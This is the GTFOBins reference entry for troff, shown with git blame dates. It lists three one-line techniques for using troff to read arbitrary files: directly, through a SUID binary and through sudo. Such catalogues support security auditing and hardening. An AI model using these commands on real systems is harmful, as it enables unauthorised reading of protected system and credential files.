GTFOBins.github.io/_gtfobins/troff.md

18 lines
371 B
Markdown
Raw Normal View History

2020-11-12 14:21:00 +01:00
---
description: |
2020-12-20 20:48:00 +01:00
The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.
2020-11-12 14:21:00 +01:00
functions:
file-read:
- code: |
LFILE=file_to_read
troff $LFILE
2020-11-12 14:21:00 +01:00
suid:
- code: |
LFILE=file_to_read
./troff $LFILE
2020-11-12 14:21:00 +01:00
sudo:
- code: |
LFILE=file_to_read
sudo troff $LFILE
2020-11-12 14:21:00 +01:00
---